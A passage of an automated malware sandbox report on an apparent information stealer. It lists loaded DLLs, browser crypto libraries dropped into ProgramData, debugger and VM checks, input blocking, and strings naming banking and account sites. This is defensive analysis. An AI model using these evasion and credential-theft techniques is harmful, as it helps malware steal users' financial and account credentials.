                    Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: srvcli.dll
                    Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: netutils.dll
                    Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: sspicli.dll
                    Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: kernel.appcore.dll
                    Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: wbemcomn.dll
                    Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: winsta.dll
                    Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: amsi.dll
                    Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: userenv.dll
                    Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: profapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pif Section loaded: wsock32.dll
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pif Section loaded: version.dll
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pif Section loaded: winmm.dll
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pif Section loaded: mpr.dll
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pif Section loaded: wininet.dll
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pif Section loaded: iphlpapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pif Section loaded: userenv.dll
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pif Section loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pif Section loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pif Section loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pif Section loaded: wldp.dll
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pif Section loaded: napinsp.dll
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pif Section loaded: pnrpnsp.dll
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pif Section loaded: wshbth.dll
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pif Section loaded: nlaapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pif Section loaded: mswsock.dll
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pif Section loaded: dnsapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pif Section loaded: winrnr.dll
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pif Section loaded: rasadhlp.dll
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pif Section loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pif Section loaded: rstrtmgr.dll
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pif Section loaded: ncrypt.dll
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pif Section loaded: ntasn1.dll
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pif Section loaded: dbghelp.dll
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pif Section loaded: iertutil.dll
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pif Section loaded: profapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pif Section loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pif Section loaded: winhttp.dll
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pif Section loaded: winnsi.dll
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pif Section loaded: urlmon.dll
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pif Section loaded: srvcli.dll
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pif Section loaded: netutils.dll
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pif Section loaded: fwpuclnt.dll
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pif Section loaded: schannel.dll
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pif Section loaded: mskeyprotect.dll
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pif Section loaded: msasn1.dll
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pif Section loaded: dpapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pif Section loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pif Section loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pif Section loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pif Section loaded: gpapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pif Section loaded: ncryptsslp.dll
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pif Section loaded: wbemcomn.dll
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pif Section loaded: amsi.dll
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pif Section loaded: ntmarta.dll
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pif Section loaded: mozglue.dll
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pif Section loaded: vcruntime140.dll
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pif Section loaded: msvcp140.dll
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pif Section loaded: windowscodecs.dll
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pif Section loaded: propsys.dll
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pif Section loaded: windows.fileexplorer.common.dll
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pif Section loaded: apphelp.dll
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pif Section loaded: ntshrui.dll
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pif Section loaded: cscapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pif Section loaded: linkinfo.dll
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pif Section loaded: edputil.dll
                    Source: C:\Windows\SysWOW64\choice.exe Section loaded: version.dll
                    Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
                    Source: Window Recorder Window detected: More than 3 window changes detected
                    Source: file.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: freebl3.pdb source: Tenant.pif, 0000000B.00000002.4080885792.00000000134A2000.00000004.00000800.00020000.00000000.sdmp, freebl3.dll.11.dr
                    Source: Binary string: mozglue.pdbP source: Tenant.pif, 0000000B.00000002.4097408823.000000006C69D000.00000002.00000001.01000000.00000009.sdmp, Tenant.pif, 0000000B.00000002.4083100268.000000001941E000.00000004.00000800.00020000.00000000.sdmp, mozglue.dll.11.dr
                    Source: Binary string: freebl3.pdbp source: Tenant.pif, 0000000B.00000002.4080885792.00000000134A2000.00000004.00000800.00020000.00000000.sdmp, freebl3.dll.11.dr
                    Source: Binary string: nss3.pdb@ source: Tenant.pif, 0000000B.00000002.4097716710.000000006C85F000.00000002.00000001.01000000.00000008.sdmp, Tenant.pif, 0000000B.00000002.4092825323.00000000311DE000.00000004.00000800.00020000.00000000.sdmp, nss3.dll.11.dr
                    Source: Binary string: softokn3.pdb@ source: Tenant.pif, 0000000B.00000002.4088074637.00000000252FB000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.dr
                    Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: Tenant.pif, 0000000B.00000002.4090409721.000000002B265000.00000004.00000800.00020000.00000000.sdmp, vcruntime140.dll.11.dr
                    Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: Tenant.pif, 0000000B.00000002.4085470552.000000001F389000.00000004.00000800.00020000.00000000.sdmp, msvcp140.dll.11.dr
                    Source: Binary string: nss3.pdb source: Tenant.pif, 0000000B.00000002.4097716710.000000006C85F000.00000002.00000001.01000000.00000008.sdmp, Tenant.pif, 0000000B.00000002.4092825323.00000000311DE000.00000004.00000800.00020000.00000000.sdmp, nss3.dll.11.dr
                    Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: Tenant.pif, 0000000B.00000002.4078109784.000000000C927000.00000004.00000800.00020000.00000000.sdmp, Tenant.pif, 0000000B.00000002.4077923010.000000000C4E8000.00000002.00001000.00020000.00000000.sdmp
                    Source: Binary string: mozglue.pdb source: Tenant.pif, 0000000B.00000002.4097408823.000000006C69D000.00000002.00000001.01000000.00000009.sdmp, Tenant.pif, 0000000B.00000002.4083100268.000000001941E000.00000004.00000800.00020000.00000000.sdmp, mozglue.dll.11.dr
                    Source: Binary string: softokn3.pdb source: Tenant.pif, 0000000B.00000002.4088074637.00000000252FB000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.dr
                    Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress
                    Source: nss3.dll.11.dr Static PE information: section name: .00cfg
                    Source: freebl3.dll.11.dr Static PE information: section name: .00cfg
                    Source: mozglue.dll.11.dr Static PE information: section name: .00cfg
                    Source: msvcp140.dll.11.dr Static PE information: section name: .didat
                    Source: softokn3.dll.11.dr Static PE information: section name: .00cfg
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pif Code function: 11_2_00AC8B75 push ecx; ret 11_2_00AC8B88

                    Persistence and Installation Behavior

                    Source: C:\Windows\SysWOW64\cmd.exe File created: C:\Users\user\AppData\Local\Temp\271973\Tenant.pif
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pif File created: C:\ProgramData\nss3.dll
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pif File created: C:\ProgramData\mozglue.dll
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pif File created: C:\ProgramData\msvcp140.dll
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pif File created: C:\ProgramData\freebl3.dll
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pif File created: C:\ProgramData\vcruntime140.dll
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pif File created: C:\ProgramData\softokn3.dll
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pif Code function: 11_2_00B259B3 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pif Code function: 11_2_00AB5EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pif Code function: 11_2_00AC33B7 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
                    Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\tasklist.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pif Process information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pif Process information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pif Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    Source: C:\Users\user\Desktop\file.exe - Stalling execution: Execution stalls by calling Sleep
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pif - Dropped PE file which has not been started: C:\ProgramData\nss3.dll
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pif - Dropped PE file which has not been started: C:\ProgramData\freebl3.dll
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pif - Dropped PE file which has not been started: C:\ProgramData\softokn3.dll
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pif - API coverage: 4.3 %
                    Source: C:\Windows\System32\conhost.exe - Last function: Thread delayed
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pif - File Volume queried: C:\ FullSizeInformation
                    Source: C:\Users\user\Desktop\file.exe - Code function: 0_2_004062D5 FindFirstFileW,FindClose,0_2_004062D5
                    Source: C:\Users\user\Desktop\file.exe - Code function: 0_2_00402E18 FindFirstFileW,0_2_00402E18
                    Source: C:\Users\user\Desktop\file.exe - Code function: 0_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406C9B
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pif - Code function: 11_2_00B04005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,11_2_00B04005
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pif - Code function: 11_2_00B0C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,11_2_00B0C2FF
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pif - Code function: 11_2_00B0494A GetFileAttributesW,FindFirstFileW,FindClose,11_2_00B0494A
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pif - Code function: 11_2_00B0CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,11_2_00B0CD9F
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pif - Code function: 11_2_00B0CD14 FindFirstFileW,FindClose,11_2_00B0CD14
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pif - Code function: 11_2_00B0F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,11_2_00B0F5D8
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pif - Code function: 11_2_00B0F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,11_2_00B0F735
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pif - Code function: 11_2_00B0FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,11_2_00B0FA36
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pif - Code function: 11_2_00B03CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,11_2_00B03CE2
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pif - Code function: 11_2_00AB5D13 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,11_2_00AB5D13
                    Source: C:\Windows\SysWOW64\cmd.exe - File opened: C:\Users\user\AppData\Local\Temp\271973\
                    Source: C:\Windows\SysWOW64\cmd.exe - File opened: C:\Users\user\AppData\Local\
                    Source: C:\Windows\SysWOW64\cmd.exe - File opened: C:\Users\user\AppData\
                    Source: C:\Windows\SysWOW64\cmd.exe - File opened: C:\Users\user\
                    Source: C:\Windows\SysWOW64\cmd.exe - File opened: C:\Users\user\AppData\Local\Temp\
                    Source: C:\Windows\SysWOW64\cmd.exe - File opened: C:\Users\user\AppData\Local\Temp\271973
                    Source: Amcache.hve.17.dr - Binary or memory string: VMware
                    Source: DHCBGD.11.dr - Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
                    Source: Tenant.pif, 0000000B.00000002.4074307202.00000000016D1000.00000004.00000800.00020000.00000000.sdmp - Binary or memory string: crosoft.com/profileVMwarep
                    Source: DHCBGD.11.dr - Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                    Source: DHCBGD.11.dr - Binary or memory string: global block list test formVMware20,11696428655
                    Source: Amcache.hve.17.dr - Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                    Source: Tenant.pif, 0000000B.00000002.4073357745.0000000001488000.00000004.00000020.00020000.00000000.sdmp - Binary or memory string: Hyper-V RAW
                    Source: DHCBGD.11.dr - Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
                    Source: Amcache.hve.17.dr - Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                    Source: DHCBGD.11.dr - Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                    Source: file.exe, 00000000.00000003.2008656133.0000000000577000.00000004.00000020.00020000.00000000.sdmp - Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf
                    Source: Amcache.hve.17.dr - Binary or memory string: vmci.sys
                    Source: DHCBGD.11.dr - Binary or memory string: AMC password management pageVMware20,11696428655
                    Source: Tenant.pif, 0000000B.00000002.4074307202.00000000016D1000.00000004.00000800.00020000.00000000.sdmp - Binary or memory string: 7MEDIAF~1abank.inMediaFoundationWidevineCdmVMwarexi5
                    Source: DHCBGD.11.dr - Binary or memory string: tasks.office.comVMware20,11696428655o
                    Source: DHCBGD.11.dr - Binary or memory string: turbotax.intuit.comVMware20,11696428655t
                    Source: DHCBGD.11.dr - Binary or memory string: interactivebrokers.comVMware20,11696428655
                    Source: DHCBGD.11.dr - Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                    Source: Amcache.hve.17.dr - Binary or memory string: VMware20,1
                    Source: Amcache.hve.17.dr - Binary or memory string: Microsoft Hyper-V Generation Counter
                    Source: Amcache.hve.17.dr - Binary or memory string: NECVMWar VMware SATA CD00
                    Source: Amcache.hve.17.dr - Binary or memory string: VMware Virtual disk SCSI Disk Device
                    Source: Tenant.pif, 0000000B.00000002.4072894428.000000000140E000.00000004.00000020.00020000.00000000.sdmp - Binary or memory string: VMwareVMware
                    Source: DHCBGD.11.dr - Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
                    Source: Amcache.hve.17.dr - Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                    Source: Tenant.pif, 0000000B.00000002.4074307202.00000000016D1000.00000004.00000800.00020000.00000000.sdmp - Binary or memory string: VMwarex
                    Source: file.exe, 00000000.00000003.2006125019.0000000000577000.00000004.00000020.00020000.00000000.sdmp - Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:
                    Source: Amcache.hve.17.dr - Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                    Source: Amcache.hve.17.dr - Binary or memory string: VMware PCI VMCI Bus Device
                    Source: Amcache.hve.17.dr - Binary or memory string: VMware VMCI Bus Device
                    Source: Amcache.hve.17.dr - Binary or memory string: VMware Virtual RAM
                    Source: Amcache.hve.17.dr - Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                    Source: DHCBGD.11.dr - Binary or memory string: bankofamerica.comVMware20,11696428655x
                    Source: DHCBGD.11.dr - Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                    Source: Amcache.hve.17.dr - Binary or memory string: vmci.inf_amd64_68ed49469341f563
                    Source: Tenant.pif, 0000000B.00000002.4072894428.00000000013CA000.00000004.00000020.00020000.00000000.sdmp - Binary or memory string: Hyper-V RAW8
                    Source: DHCBGD.11.dr - Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
                    Source: Amcache.hve.17.dr - Binary or memory string: VMware Virtual USB Mouse
                    Source: Amcache.hve.17.dr - Binary or memory string: vmci.syshbin
                    Source: Amcache.hve.17.dr - Binary or memory string: VMware, Inc.
                    Source: DHCBGD.11.dr - Binary or memory string: discord.comVMware20,11696428655f
                    Source: Amcache.hve.17.dr - Binary or memory string: VMware20,1hbin@
                    Source: Amcache.hve.17.dr - Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                    Source: Amcache.hve.17.dr - Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                    Source: DHCBGD.11.dr - Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
                    Source: Amcache.hve.17.dr - Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                    Source: DHCBGD.11.dr - Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                    Source: DHCBGD.11.dr - Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                    Source: DHCBGD.11.dr - Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                    Source: DHCBGD.11.dr - Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
                    Source: Amcache.hve.17.dr - Binary or memory string: c:/windows/system32/drivers/vmci.sys
                    Source: DHCBGD.11.dr - Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                    Source: DHCBGD.11.dr - Binary or memory string: outlook.office365.comVMware20,11696428655t
                    Source: DHCBGD.11.dr - Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                    Source: Amcache.hve.17.dr - Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                    Source: DHCBGD.11.dr - Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                    Source: DHCBGD.11.dr - Binary or memory string: outlook.office.comVMware20,11696428655s
                    Source: DHCBGD.11.dr - Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                    Source: DHCBGD.11.dr - Binary or memory string: ms.portal.azure.comVMware20,11696428655
                    Source: Amcache.hve.17.dr - Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
                    Source: Amcache.hve.17.dr - Binary or memory string: vmci.syshbin`
                    Source: DHCBGD.11.dr - Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                    Source: Amcache.hve.17.dr - Binary or memory string: \driver\vmci,\driver\pci
                    Source: DHCBGD.11.dr - Binary or memory string: dev.azure.comVMware20,11696428655j
                    Source: Amcache.hve.17.dr - Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                    Source: DHCBGD.11.dr - Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
                    Source: Amcache.hve.17.dr - Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                    Source: Tenant.pif, 0000000B.00000002.4074307202.00000000016D1000.00000004.00000800.00020000.00000000.sdmp - Binary or memory string: crosoft.com/profileVMwarepnacl
                    Source: DHCBGD.11.dr - Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pif - Process information queried: ProcessInformation
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pif - Process queried: DebugPort
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pif - Code function: 11_2_00B145D5 BlockInput,11_2_00B145D5
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pif - Code function: 11_2_00AB5240 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,11_2_00AB5240
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pif - Code function: 11_2_00AD5CAC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,11_2_00AD5CAC
                    Source: C:\Users\user\Desktop\file.exe - Code function: 0_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_004062FC
                    Source: C:\Users\user\AppData\Local\Temp\271973\Tenant.pif - Code function: 11_2_00AF88CD GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,11_2_00AF88CD
